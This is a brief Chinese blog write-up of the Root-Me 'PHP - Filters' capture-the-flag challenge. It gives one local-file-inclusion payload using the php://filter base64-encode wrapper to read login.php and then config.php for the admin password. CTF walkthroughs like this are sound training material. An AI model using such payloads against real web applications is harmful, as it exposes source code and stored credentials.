PHP - Filters

Posted abbin-blog

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP - Filters相关的知识,希望对你有一定的参考价值。

Retrieve the administrator password of this application.

 

对文件包含的介绍------------第一个链接需要谷歌

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

 

此处使用php://filter伪协议:

payload:

  http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php

读取到login.php的内容后base64解密:

技术图片

 

 再根据php代码,读取config.php的文件内容:

  技术图片

以上是关于PHP - Filters的主要内容,如果未能解决你的问题,请参考以下文章

php [guzzle php] guzzle php #php

php send.php php邮件模板#php

IntelliJ IDEA 11编辑php是,支持php文件名为.php5和.php4,如何设置能让其也支持.php呢?

如何从php5升级到php7

请问php中如何调用php文件中的内容?

php [php:PHPMailer示例] php库“PHPMailer”示例。 #PHP